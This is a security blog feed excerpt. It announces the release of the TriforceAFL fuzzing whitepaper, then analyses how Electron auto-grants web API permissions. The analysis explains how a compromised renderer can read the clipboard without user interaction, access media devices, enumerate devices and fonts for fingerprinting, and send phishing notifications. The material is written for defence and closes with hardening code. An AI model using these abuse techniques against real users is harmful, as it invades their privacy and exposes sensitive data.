The post How Circle Banned Tornado Cash Users appeared first on Nettitude Labs.

Whitepaper – Project Triforce: Run AFL On Everything (2017)

27 September 2022 at 19:28

Six years ago, NCC Group researchers Tim Newsham and Jesse Hertz released TriforceAFL – an extension of the American Fuzzy Lop (AFL) fuzzer which supports full-system fuzzing using QEMU – but unfortunately the associated whitepaper for this work was never published. Today, we’re releasing it for the curious reader and historical archives alike. While fuzzing has come a long way since 2016/2017, we hope that this paper will provide some valuable additional detail on TriforceAFL to the research community beyond the original TriforceAFL blog post (2016).

Abstract

In this paper we present Project Triforce, our extension of American Fuzzy Lop (AFL),
allowing it to fuzz virtual machines running under QEMU’s full system emulation mode.
We used this framework to build TriforceLinuxSyscallFuzzer (TLSF) syscall fuzzer, which
has already found several kernel vulnerabilities. This paper details the iteration and
design of both TriforceAFL and TLSF, both of which encountered some interesting
obstacles and discoveries. Then, we’ll analyze crashes found by the fuzzer, and talk
about future directions, including our work fuzzing OpenBSD.


This whitepaper may be downloaded below:

Diving Into Electron Web API Permissions

26 September 2022 at 22:00

Introduction

When a Chrome user opens a site on the Internet that requests a permission, Chrome displays a large prompt in the top left corner. The prompt remains visible on the page until the user interacts with it, reloads the page, or navigates away. The permission prompt has Block and Allow buttons, and an option to close it. On top of this, Chrome 98 displays the full prompt only if the permission was triggered “through a user gesture when interacting with the site itself”. These precautionary measures are the only things preventing a malicious site from using APIs that could affect user privacy or security.

Chrome Permission Prompt

Since Chrome implements this pop-up box, how does Electron handle permissions? From Electron’s documentation:

“In Electron the permission API is based on Chromium and implements the same types of permissions. By default, Electron will automatically approve all permission requests unless the developer has manually configured a custom handler. While a solid default, security-conscious developers might want to assume the very opposite.”

This approval can lead to serious security and privacy consequences if the renderer process of the Electron application were to be compromised via unsafe navigation (e.g., open redirect, clicking links) or cross-site scripting. We decided to investigate how Electron implements various permission checks to compare Electron’s behavior to that of Chrome and determine how a compromised renderer process may be able to abuse web APIs.

Webcam, Microphone, and Screen Recording Permissions

The webcam, microphone, and screen recording functionalities present a serious risk to users when approval is granted by default. Without implementing a permission handler, an Electron app’s renderer process will have access to a user’s webcam and microphone. However, screen recording requires the Electron app to have configured a source via a desktopCapturer in the main process. This leaves little room for exploitability from the renderer process, unless the application already needs to record a user’s screen.

Electron groups these three into one permission, “media”. In Chrome, these permissions are separate. Electron’s lack of separation between these three is problematic because there may be cases where an application only requires the microphone, for example, but must also be granted access to record video. By default, the application would not have the capability to deny access to video without also denying access to audio. For those wondering, modern Electron apps seemingly handling microphone & video permissions separately, are only tracking and respecting the user choices in their UI. An attacker with a compromised renderer could still access any media.

It is also possible for media devices to be enumerated even when permission has not been granted. In Chrome however, an origin can only see devices that it has permission to use. The API navigator.mediaDevices.enumerateDevices() will return all of the user’s media devices, which can be used to fingerprint the user’s devices. For example, we can see a label of “Default - MacBook Pro Microphone (Built-in)”, despite having a deny-all permission handler.

navigator.mediaDevices.enumerateDevices()

To deny access to all media devices (but not prevent enumerating the devices), a permission handler must be implemented in the main process that rejects requests for the “media” permission.

File System Access API

The File System Access API normally allows access to read and write to local files. In Electron, reading files has been implemented but writing to files has not been implemented and permission to write to files is always denied. However, access to read files is always granted when a user selects a file or directory. In Chrome, when a user selects a file or directory, Chrome notifies you that you are granting access to a specific file or directory until all tabs of that site are closed. In addition, Chrome prevents access to directories or files that are deemed too sensitive to disclose to a site. These are both considerations mentioned in the API’s standard (discussed by the WICG).

  • “User agents should try to make sure that users are aware of what exactly they’re giving websites access to” – implemented in Chrome with the notification after choosing a file or directory
Chrome's prompt: Let site view files?
  • “User agents are encouraged to restrict which directories a user is allowed to select in a directory picker, and potentially even restrict which files the user is allowed to select” – implemented in Chrome by preventing users from sharing certain directories containing system files. In Electron, there is no such notification or prevention. A user is allowed to select their root directory or any other sensitive directory, potentially granting more access than intended to a website. There will be no notification alerting the user of the level of access they will be granting.

Clipboard, Notification, and Idle Detection APIs

For these three APIs, the renderer process is granted access by default. This means a compromised renderer process can read the clipboard, send desktop notifications, and detect when a user is idle.

Clipboard

Access to the user’s clipboard is extremely security-relevant because some users will copy passwords or other sensitive information to the clipboard. Normally, Chromium denies access to reading the clipboard unless it was triggered by a user’s action. However, we found that adding an event handler for the window’s load event would allow us to read the clipboard without user interaction.

Cliboard Reading Callback
Cliboard Reading Callback

To deny access to this API, deny access to the “clipboard-read” permission.

Notifications

Sending desktop notifications is another security-relevant feature because desktop notifications can be used to increase the success rate of phishing or other social engineering attempts.

PoC for Notification API Attack

To deny access to this API, deny access to the “notifications” permission.

Idle Detection

The Idle Detection API is much less security-relevant, but its abuse still represents a violation of user privacy.

Idle Detection API abuse

To deny access to this API, deny access to the “idle-detection” permission.

Local Font Access API

For this API, the renderer process is granted access by default. Furthermore, the main process never receives a permission request. This means that a compromised renderer process can always read a user’s fonts. This behavior has significant privacy implications because the user’s local fonts can be used as a fingerprint for tracking purposes and they may even reveal that a user works for a specific company or organization. Yes, we do use custom fonts for our reports!

Local Font Access API abuse

Security Hardening for Electron App Permissions

What can you do to reduce your Electron application’s risk? You can quickly assess if you are mitigating these issues and the effectiveness of your current mitigations using ElectroNG, the first SAST tool capable of rapid vulnerability detection and identifying missing hardening configurations. Among its many features, ElectroNG features a dedicated check designed to identify if your application is secure from permission-related abuses:

ElectroNG Permission Check

A secure application will usually deny all the permissions for dangerous web APIs by default. This can be achieved by adding a permission handler to a Session as follows:

  ses.setPermissionRequestHandler((webContents, permission, callback) => {
    return callback(false);
  })

If your application needs to allow the renderer process permission to access some web APIs, you can add exceptions by modifying the permission handler. We recommend checking if the origin requesting permission matches an expected origin. It’s a good practice to also set the permission request handler to null first to force any permission to be requested again. Without this, revoked permissions might still be available if they’ve already been used successfully.

session.defaultSession.setPermissionRequestHandler(null);

Conclusions

As we discussed, these permissions present significant risk to users even in Electron applications setting the most restrictive webPreferences settings. Because of this, it’s important for security teams & developers to strictly manage the permissions that Electron will automatically approve unless the developer has manually configured a custom handler.

  • There are no more articles
❌